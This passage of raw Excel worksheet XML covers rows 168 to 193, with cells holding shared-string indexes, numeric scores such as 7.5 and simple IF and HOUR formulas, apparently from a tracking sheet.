      </c>
      <c r="D168" s="4" t="s">
        <v>1243</v>
      </c>
      <c r="E168" s="4" t="s">
        <v>1244</v>
      </c>
      <c r="F168" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G168" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H168" s="4">
        <v>5.3</v>
      </c>
      <c r="I168" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J168" s="4"/>
      <c r="K168" s="4"/>
      <c r="L168" s="4">
        <f>IF(out!$G168="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M168" s="4"/>
      <c r="N168" s="4"/>
      <c r="O168" s="13"/>
      <c r="P168" s="4"/>
      <c r="Q168" s="13">
        <f>HOUR(out!$P168 -out!$N168)</f>
        <v>0</v>
      </c>
      <c r="R168" s="18"/>
      <c r="S168" s="4"/>
      <c r="T168" s="4"/>
      <c r="U168" s="4"/>
      <c r="V168" s="7"/>
    </row>
    <row r="169" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A169" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B169" s="4" t="s">
        <v>1245</v>
      </c>
      <c r="C169" s="4" t="s">
        <v>1246</v>
      </c>
      <c r="D169" s="4" t="s">
        <v>1247</v>
      </c>
      <c r="E169" s="4" t="s">
        <v>1248</v>
      </c>
      <c r="F169" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G169" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H169" s="4">
        <v>7.5</v>
      </c>
      <c r="I169" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J169" s="4"/>
      <c r="K169" s="4"/>
      <c r="L169" s="4">
        <f>IF(out!$G169="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M169" s="4"/>
      <c r="N169" s="4"/>
      <c r="O169" s="13"/>
      <c r="P169" s="4"/>
      <c r="Q169" s="13">
        <f>HOUR(out!$P169 -out!$N169)</f>
        <v>0</v>
      </c>
      <c r="R169" s="18"/>
      <c r="S169" s="4"/>
      <c r="T169" s="4"/>
      <c r="U169" s="4"/>
      <c r="V169" s="7"/>
    </row>
    <row r="170" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A170" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B170" s="4" t="s">
        <v>1249</v>
      </c>
      <c r="C170" s="4" t="s">
        <v>1250</v>
      </c>
      <c r="D170" s="4" t="s">
        <v>1251</v>
      </c>
      <c r="E170" s="4" t="s">
        <v>1252</v>
      </c>
      <c r="F170" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G170" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H170" s="4">
        <v>7.5</v>
      </c>
      <c r="I170" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J170" s="4"/>
      <c r="K170" s="4"/>
      <c r="L170" s="4">
        <f>IF(out!$G170="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M170" s="4"/>
      <c r="N170" s="4"/>
      <c r="O170" s="13"/>
      <c r="P170" s="4"/>
      <c r="Q170" s="13">
        <f>HOUR(out!$P170 -out!$N170)</f>
        <v>0</v>
      </c>
      <c r="R170" s="18"/>
      <c r="S170" s="4"/>
      <c r="T170" s="4"/>
      <c r="U170" s="4"/>
      <c r="V170" s="7"/>
    </row>
    <row r="171" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A171" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B171" s="4" t="s">
        <v>1253</v>
      </c>
      <c r="C171" s="4" t="s">
        <v>1254</v>
      </c>
      <c r="D171" s="4" t="s">
        <v>1255</v>
      </c>
      <c r="E171" s="4" t="s">
        <v>1256</v>
      </c>
      <c r="F171" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G171" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H171" s="4">
        <v>7.5</v>
      </c>
      <c r="I171" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J171" s="4"/>
      <c r="K171" s="4"/>
      <c r="L171" s="4">
        <f>IF(out!$G171="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M171" s="4"/>
      <c r="N171" s="4"/>
      <c r="O171" s="13"/>
      <c r="P171" s="4"/>
      <c r="Q171" s="13">
        <f>HOUR(out!$P171 -out!$N171)</f>
        <v>0</v>
      </c>
      <c r="R171" s="18"/>
      <c r="S171" s="4"/>
      <c r="T171" s="4"/>
      <c r="U171" s="4"/>
      <c r="V171" s="7"/>
    </row>
    <row r="172" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A172" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B172" s="4" t="s">
        <v>1257</v>
      </c>
      <c r="C172" s="4" t="s">
        <v>1258</v>
      </c>
      <c r="D172" s="4" t="s">
        <v>1259</v>
      </c>
      <c r="E172" s="4" t="s">
        <v>1260</v>
      </c>
      <c r="F172" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G172" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H172" s="4">
        <v>7.5</v>
      </c>
      <c r="I172" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J172" s="4"/>
      <c r="K172" s="4"/>
      <c r="L172" s="4">
        <f>IF(out!$G172="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M172" s="4"/>
      <c r="N172" s="4"/>
      <c r="O172" s="13"/>
      <c r="P172" s="4"/>
      <c r="Q172" s="13">
        <f>HOUR(out!$P172 -out!$N172)</f>
        <v>0</v>
      </c>
      <c r="R172" s="18"/>
      <c r="S172" s="4"/>
      <c r="T172" s="4"/>
      <c r="U172" s="4"/>
      <c r="V172" s="7"/>
    </row>
    <row r="173" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A173" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B173" s="4" t="s">
        <v>1261</v>
      </c>
      <c r="C173" s="4" t="s">
        <v>1262</v>
      </c>
      <c r="D173" s="4" t="s">
        <v>1263</v>
      </c>
      <c r="E173" s="4" t="s">
        <v>1264</v>
      </c>
      <c r="F173" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G173" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H173" s="4">
        <v>7.5</v>
      </c>
      <c r="I173" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J173" s="4"/>
      <c r="K173" s="4"/>
      <c r="L173" s="4">
        <f>IF(out!$G173="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M173" s="4"/>
      <c r="N173" s="4"/>
      <c r="O173" s="13"/>
      <c r="P173" s="4"/>
      <c r="Q173" s="13">
        <f>HOUR(out!$P173 -out!$N173)</f>
        <v>0</v>
      </c>
      <c r="R173" s="18"/>
      <c r="S173" s="4"/>
      <c r="T173" s="4"/>
      <c r="U173" s="4"/>
      <c r="V173" s="7"/>
    </row>
    <row r="174" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A174" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B174" s="4" t="s">
        <v>1265</v>
      </c>
      <c r="C174" s="4" t="s">
        <v>1266</v>
      </c>
      <c r="D174" s="4" t="s">
        <v>1267</v>
      </c>
      <c r="E174" s="4" t="s">
        <v>1268</v>
      </c>
      <c r="F174" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G174" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H174" s="4">
        <v>7.5</v>
      </c>
      <c r="I174" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J174" s="4"/>
      <c r="K174" s="4"/>
      <c r="L174" s="4">
        <f>IF(out!$G174="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M174" s="4"/>
      <c r="N174" s="4"/>
      <c r="O174" s="13"/>
      <c r="P174" s="4"/>
      <c r="Q174" s="13">
        <f>HOUR(out!$P174 -out!$N174)</f>
        <v>0</v>
      </c>
      <c r="R174" s="18"/>
      <c r="S174" s="4"/>
      <c r="T174" s="4"/>
      <c r="U174" s="4"/>
      <c r="V174" s="7"/>
    </row>
    <row r="175" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A175" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B175" s="4" t="s">
        <v>1269</v>
      </c>
      <c r="C175" s="4" t="s">
        <v>1270</v>
      </c>
      <c r="D175" s="4" t="s">
        <v>1271</v>
      </c>
      <c r="E175" s="4" t="s">
        <v>1272</v>
      </c>
      <c r="F175" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G175" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H175" s="4">
        <v>7.5</v>
      </c>
      <c r="I175" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J175" s="4"/>
      <c r="K175" s="4"/>
      <c r="L175" s="4">
        <f>IF(out!$G175="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M175" s="4"/>
      <c r="N175" s="4"/>
      <c r="O175" s="13"/>
      <c r="P175" s="4"/>
      <c r="Q175" s="13">
        <f>HOUR(out!$P175 -out!$N175)</f>
        <v>0</v>
      </c>
      <c r="R175" s="18"/>
      <c r="S175" s="4"/>
      <c r="T175" s="4"/>
      <c r="U175" s="4"/>
      <c r="V175" s="7"/>
    </row>
    <row r="176" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A176" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B176" s="4" t="s">
        <v>1273</v>
      </c>
      <c r="C176" s="4" t="s">
        <v>1274</v>
      </c>
      <c r="D176" s="4" t="s">
        <v>1275</v>
      </c>
      <c r="E176" s="4" t="s">
        <v>1276</v>
      </c>
      <c r="F176" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G176" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H176" s="4">
        <v>7.5</v>
      </c>
      <c r="I176" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J176" s="4"/>
      <c r="K176" s="4"/>
      <c r="L176" s="4">
        <f>IF(out!$G176="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M176" s="4"/>
      <c r="N176" s="4"/>
      <c r="O176" s="13"/>
      <c r="P176" s="4"/>
      <c r="Q176" s="13">
        <f>HOUR(out!$P176 -out!$N176)</f>
        <v>0</v>
      </c>
      <c r="R176" s="18"/>
      <c r="S176" s="4"/>
      <c r="T176" s="4"/>
      <c r="U176" s="4"/>
      <c r="V176" s="7"/>
    </row>
    <row r="177" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A177" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B177" s="4" t="s">
        <v>1277</v>
      </c>
      <c r="C177" s="4" t="s">
        <v>1278</v>
      </c>
      <c r="D177" s="4" t="s">
        <v>1279</v>
      </c>
      <c r="E177" s="4" t="s">
        <v>1280</v>
      </c>
      <c r="F177" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G177" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H177" s="4">
        <v>7.5</v>
      </c>
      <c r="I177" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J177" s="4"/>
      <c r="K177" s="4"/>
      <c r="L177" s="4">
        <f>IF(out!$G177="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M177" s="4"/>
      <c r="N177" s="4"/>
      <c r="O177" s="13"/>
      <c r="P177" s="4"/>
      <c r="Q177" s="13">
        <f>HOUR(out!$P177 -out!$N177)</f>
        <v>0</v>
      </c>
      <c r="R177" s="18"/>
      <c r="S177" s="4"/>
      <c r="T177" s="4"/>
      <c r="U177" s="4"/>
      <c r="V177" s="7"/>
    </row>
    <row r="178" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A178" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B178" s="4" t="s">
        <v>1281</v>
      </c>
      <c r="C178" s="4" t="s">
        <v>1282</v>
      </c>
      <c r="D178" s="4" t="s">
        <v>1283</v>
      </c>
      <c r="E178" s="4" t="s">
        <v>1284</v>
      </c>
      <c r="F178" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G178" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H178" s="4">
        <v>7.5</v>
      </c>
      <c r="I178" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J178" s="4"/>
      <c r="K178" s="4"/>
      <c r="L178" s="4">
        <f>IF(out!$G178="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M178" s="4"/>
      <c r="N178" s="4"/>
      <c r="O178" s="13"/>
      <c r="P178" s="4"/>
      <c r="Q178" s="13">
        <f>HOUR(out!$P178 -out!$N178)</f>
        <v>0</v>
      </c>
      <c r="R178" s="18"/>
      <c r="S178" s="4"/>
      <c r="T178" s="4"/>
      <c r="U178" s="4"/>
      <c r="V178" s="7"/>
    </row>
    <row r="179" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A179" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B179" s="4" t="s">
        <v>1285</v>
      </c>
      <c r="C179" s="4" t="s">
        <v>1286</v>
      </c>
      <c r="D179" s="4" t="s">
        <v>1287</v>
      </c>
      <c r="E179" s="4" t="s">
        <v>1288</v>
      </c>
      <c r="F179" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G179" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H179" s="4">
        <v>7.5</v>
      </c>
      <c r="I179" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J179" s="4"/>
      <c r="K179" s="4"/>
      <c r="L179" s="4">
        <f>IF(out!$G179="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M179" s="4"/>
      <c r="N179" s="4"/>
      <c r="O179" s="13"/>
      <c r="P179" s="4"/>
      <c r="Q179" s="13">
        <f>HOUR(out!$P179 -out!$N179)</f>
        <v>0</v>
      </c>
      <c r="R179" s="18"/>
      <c r="S179" s="4"/>
      <c r="T179" s="4"/>
      <c r="U179" s="4"/>
      <c r="V179" s="7"/>
    </row>
    <row r="180" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A180" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B180" s="4" t="s">
        <v>1289</v>
      </c>
      <c r="C180" s="4" t="s">
        <v>1290</v>
      </c>
      <c r="D180" s="4" t="s">
        <v>1291</v>
      </c>
      <c r="E180" s="4" t="s">
        <v>1292</v>
      </c>
      <c r="F180" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G180" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H180" s="4">
        <v>7.5</v>
      </c>
      <c r="I180" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J180" s="4"/>
      <c r="K180" s="4"/>
      <c r="L180" s="4">
        <f>IF(out!$G180="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M180" s="4"/>
      <c r="N180" s="4"/>
      <c r="O180" s="13"/>
      <c r="P180" s="4"/>
      <c r="Q180" s="13">
        <f>HOUR(out!$P180 -out!$N180)</f>
        <v>0</v>
      </c>
      <c r="R180" s="18"/>
      <c r="S180" s="4"/>
      <c r="T180" s="4"/>
      <c r="U180" s="4"/>
      <c r="V180" s="7"/>
    </row>
    <row r="181" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A181" s="3" t="s">
        <v>1293</v>
      </c>
      <c r="B181" s="4" t="s">
        <v>1294</v>
      </c>
      <c r="C181" s="4" t="s">
        <v>1295</v>
      </c>
      <c r="D181" s="4" t="s">
        <v>806</v>
      </c>
      <c r="E181" s="4" t="s">
        <v>807</v>
      </c>
      <c r="F181" s="4" t="s">
        <v>1296</v>
      </c>
      <c r="G181" s="4" t="s">
        <v>1297</v>
      </c>
      <c r="H181" s="4">
        <v>7.7</v>
      </c>
      <c r="I181" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J181" s="4"/>
      <c r="K181" s="4"/>
      <c r="L181" s="4">
        <f>IF(out!$G181="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M181" s="4"/>
      <c r="N181" s="4"/>
      <c r="O181" s="13"/>
      <c r="P181" s="4"/>
      <c r="Q181" s="13">
        <f>HOUR(out!$P181 -out!$N181)</f>
        <v>0</v>
      </c>
      <c r="R181" s="18"/>
      <c r="S181" s="4"/>
      <c r="T181" s="4"/>
      <c r="U181" s="4"/>
      <c r="V181" s="7"/>
    </row>
    <row r="182" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A182" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B182" s="4" t="s">
        <v>1298</v>
      </c>
      <c r="C182" s="4" t="s">
        <v>1299</v>
      </c>
      <c r="D182" s="4" t="s">
        <v>1300</v>
      </c>
      <c r="E182" s="4" t="s">
        <v>1301</v>
      </c>
      <c r="F182" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G182" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H182" s="4">
        <v>7.5</v>
      </c>
      <c r="I182" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J182" s="4"/>
      <c r="K182" s="4"/>
      <c r="L182" s="4">
        <f>IF(out!$G182="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M182" s="4"/>
      <c r="N182" s="4"/>
      <c r="O182" s="13"/>
      <c r="P182" s="4"/>
      <c r="Q182" s="13">
        <f>HOUR(out!$P182 -out!$N182)</f>
        <v>0</v>
      </c>
      <c r="R182" s="18"/>
      <c r="S182" s="4"/>
      <c r="T182" s="4"/>
      <c r="U182" s="4"/>
      <c r="V182" s="7"/>
    </row>
    <row r="183" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A183" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B183" s="4" t="s">
        <v>1302</v>
      </c>
      <c r="C183" s="4" t="s">
        <v>1303</v>
      </c>
      <c r="D183" s="4" t="s">
        <v>1304</v>
      </c>
      <c r="E183" s="4" t="s">
        <v>1305</v>
      </c>
      <c r="F183" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G183" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H183" s="4">
        <v>7.5</v>
      </c>
      <c r="I183" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J183" s="4"/>
      <c r="K183" s="4"/>
      <c r="L183" s="4">
        <f>IF(out!$G183="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M183" s="4"/>
      <c r="N183" s="4"/>
      <c r="O183" s="13"/>
      <c r="P183" s="4"/>
      <c r="Q183" s="13">
        <f>HOUR(out!$P183 -out!$N183)</f>
        <v>0</v>
      </c>
      <c r="R183" s="18"/>
      <c r="S183" s="4"/>
      <c r="T183" s="4"/>
      <c r="U183" s="4"/>
      <c r="V183" s="7"/>
    </row>
    <row r="184" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A184" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B184" s="4" t="s">
        <v>1306</v>
      </c>
      <c r="C184" s="4" t="s">
        <v>1307</v>
      </c>
      <c r="D184" s="4" t="s">
        <v>1308</v>
      </c>
      <c r="E184" s="4" t="s">
        <v>1309</v>
      </c>
      <c r="F184" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G184" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H184" s="4">
        <v>7.5</v>
      </c>
      <c r="I184" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J184" s="4"/>
      <c r="K184" s="4"/>
      <c r="L184" s="4">
        <f>IF(out!$G184="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M184" s="4"/>
      <c r="N184" s="4"/>
      <c r="O184" s="13"/>
      <c r="P184" s="4"/>
      <c r="Q184" s="13">
        <f>HOUR(out!$P184 -out!$N184)</f>
        <v>0</v>
      </c>
      <c r="R184" s="18"/>
      <c r="S184" s="4"/>
      <c r="T184" s="4"/>
      <c r="U184" s="4"/>
      <c r="V184" s="7"/>
    </row>
    <row r="185" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A185" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B185" s="4" t="s">
        <v>1310</v>
      </c>
      <c r="C185" s="4" t="s">
        <v>1311</v>
      </c>
      <c r="D185" s="4" t="s">
        <v>1312</v>
      </c>
      <c r="E185" s="4" t="s">
        <v>1313</v>
      </c>
      <c r="F185" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G185" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H185" s="4">
        <v>7.5</v>
      </c>
      <c r="I185" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J185" s="4"/>
      <c r="K185" s="4"/>
      <c r="L185" s="4">
        <f>IF(out!$G185="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M185" s="4"/>
      <c r="N185" s="4"/>
      <c r="O185" s="13"/>
      <c r="P185" s="4"/>
      <c r="Q185" s="13">
        <f>HOUR(out!$P185 -out!$N185)</f>
        <v>0</v>
      </c>
      <c r="R185" s="18"/>
      <c r="S185" s="4"/>
      <c r="T185" s="4"/>
      <c r="U185" s="4"/>
      <c r="V185" s="7"/>
    </row>
    <row r="186" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A186" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B186" s="4" t="s">
        <v>1314</v>
      </c>
      <c r="C186" s="4" t="s">
        <v>1315</v>
      </c>
      <c r="D186" s="4" t="s">
        <v>1316</v>
      </c>
      <c r="E186" s="4" t="s">
        <v>1317</v>
      </c>
      <c r="F186" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G186" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H186" s="4">
        <v>7.5</v>
      </c>
      <c r="I186" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J186" s="4"/>
      <c r="K186" s="4"/>
      <c r="L186" s="4">
        <f>IF(out!$G186="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M186" s="4"/>
      <c r="N186" s="4"/>
      <c r="O186" s="13"/>
      <c r="P186" s="4"/>
      <c r="Q186" s="13">
        <f>HOUR(out!$P186 -out!$N186)</f>
        <v>0</v>
      </c>
      <c r="R186" s="18"/>
      <c r="S186" s="4"/>
      <c r="T186" s="4"/>
      <c r="U186" s="4"/>
      <c r="V186" s="7"/>
    </row>
    <row r="187" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A187" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B187" s="4" t="s">
        <v>1318</v>
      </c>
      <c r="C187" s="4" t="s">
        <v>1319</v>
      </c>
      <c r="D187" s="4" t="s">
        <v>1320</v>
      </c>
      <c r="E187" s="4" t="s">
        <v>1321</v>
      </c>
      <c r="F187" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G187" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H187" s="4">
        <v>7.5</v>
      </c>
      <c r="I187" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J187" s="4"/>
      <c r="K187" s="4"/>
      <c r="L187" s="4">
        <f>IF(out!$G187="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M187" s="4"/>
      <c r="N187" s="4"/>
      <c r="O187" s="13"/>
      <c r="P187" s="4"/>
      <c r="Q187" s="13">
        <f>HOUR(out!$P187 -out!$N187)</f>
        <v>0</v>
      </c>
      <c r="R187" s="18"/>
      <c r="S187" s="4"/>
      <c r="T187" s="4"/>
      <c r="U187" s="4"/>
      <c r="V187" s="7"/>
    </row>
    <row r="188" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A188" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B188" s="4" t="s">
        <v>1322</v>
      </c>
      <c r="C188" s="4" t="s">
        <v>1323</v>
      </c>
      <c r="D188" s="4" t="s">
        <v>1324</v>
      </c>
      <c r="E188" s="4" t="s">
        <v>1325</v>
      </c>
      <c r="F188" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G188" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H188" s="4">
        <v>7.5</v>
      </c>
      <c r="I188" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J188" s="4"/>
      <c r="K188" s="4"/>
      <c r="L188" s="4">
        <f>IF(out!$G188="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M188" s="4"/>
      <c r="N188" s="4"/>
      <c r="O188" s="13"/>
      <c r="P188" s="4"/>
      <c r="Q188" s="13">
        <f>HOUR(out!$P188 -out!$N188)</f>
        <v>0</v>
      </c>
      <c r="R188" s="18"/>
      <c r="S188" s="4"/>
      <c r="T188" s="4"/>
      <c r="U188" s="4"/>
      <c r="V188" s="7"/>
    </row>
    <row r="189" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A189" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B189" s="4" t="s">
        <v>1326</v>
      </c>
      <c r="C189" s="4" t="s">
        <v>1327</v>
      </c>
      <c r="D189" s="4" t="s">
        <v>1328</v>
      </c>
      <c r="E189" s="4" t="s">
        <v>1329</v>
      </c>
      <c r="F189" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G189" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H189" s="4">
        <v>7.5</v>
      </c>
      <c r="I189" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J189" s="4"/>
      <c r="K189" s="4"/>
      <c r="L189" s="4">
        <f>IF(out!$G189="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M189" s="4"/>
      <c r="N189" s="4"/>
      <c r="O189" s="13"/>
      <c r="P189" s="4"/>
      <c r="Q189" s="13">
        <f>HOUR(out!$P189 -out!$N189)</f>
        <v>0</v>
      </c>
      <c r="R189" s="18"/>
      <c r="S189" s="4"/>
      <c r="T189" s="4"/>
      <c r="U189" s="4"/>
      <c r="V189" s="7"/>
    </row>
    <row r="190" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A190" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B190" s="4" t="s">
        <v>1330</v>
      </c>
      <c r="C190" s="4" t="s">
        <v>1331</v>
      </c>
      <c r="D190" s="4" t="s">
        <v>1332</v>
      </c>
      <c r="E190" s="4" t="s">
        <v>1333</v>
      </c>
      <c r="F190" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G190" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H190" s="4">
        <v>7.5</v>
      </c>
      <c r="I190" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J190" s="4"/>
      <c r="K190" s="4"/>
      <c r="L190" s="4">
        <f>IF(out!$G190="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M190" s="4"/>
      <c r="N190" s="4"/>
      <c r="O190" s="13"/>
      <c r="P190" s="4"/>
      <c r="Q190" s="13">
        <f>HOUR(out!$P190 -out!$N190)</f>
        <v>0</v>
      </c>
      <c r="R190" s="18"/>
      <c r="S190" s="4"/>
      <c r="T190" s="4"/>
      <c r="U190" s="4"/>
      <c r="V190" s="7"/>
    </row>
    <row r="191" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A191" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B191" s="4" t="s">
        <v>1334</v>
      </c>
      <c r="C191" s="4" t="s">
        <v>1335</v>
      </c>
      <c r="D191" s="4" t="s">
        <v>1336</v>
      </c>
      <c r="E191" s="4" t="s">
        <v>1337</v>
      </c>
      <c r="F191" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G191" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H191" s="4">
        <v>7.5</v>
      </c>
      <c r="I191" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J191" s="4"/>
      <c r="K191" s="4"/>
      <c r="L191" s="4">
        <f>IF(out!$G191="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M191" s="4"/>
      <c r="N191" s="4"/>
      <c r="O191" s="13"/>
      <c r="P191" s="4"/>
      <c r="Q191" s="13">
        <f>HOUR(out!$P191 -out!$N191)</f>
        <v>0</v>
      </c>
      <c r="R191" s="18"/>
      <c r="S191" s="4"/>
      <c r="T191" s="4"/>
      <c r="U191" s="4"/>
      <c r="V191" s="7"/>
    </row>
    <row r="192" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A192" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B192" s="4" t="s">
        <v>1338</v>
      </c>
      <c r="C192" s="4" t="s">
        <v>1339</v>
      </c>
      <c r="D192" s="4" t="s">
        <v>1340</v>
      </c>
      <c r="E192" s="4" t="s">
        <v>1341</v>
      </c>
      <c r="F192" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G192" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H192" s="4">
        <v>7.5</v>
      </c>
      <c r="I192" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J192" s="4"/>
      <c r="K192" s="4"/>
      <c r="L192" s="4">
        <f>IF(out!$G192="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M192" s="4"/>
      <c r="N192" s="4"/>
      <c r="O192" s="13"/>
      <c r="P192" s="4"/>
      <c r="Q192" s="13">
        <f>HOUR(out!$P192 -out!$N192)</f>
        <v>0</v>
      </c>
      <c r="R192" s="18"/>
      <c r="S192" s="4"/>
      <c r="T192" s="4"/>
      <c r="U192" s="4"/>
      <c r="V192" s="7"/>
    </row>
    <row r="193" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A193" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B193" s="4" t="s">
        <v>1342</v>
      </c>
      <c r="C193" s="4" t="s">
        <v>1343</v>
      </c>
      <c r="D193" s="4" t="s">
        <v>1344</v>
      </c>
      <c r="E193" s="4" t="s">
        <v>1345</v>
      </c>
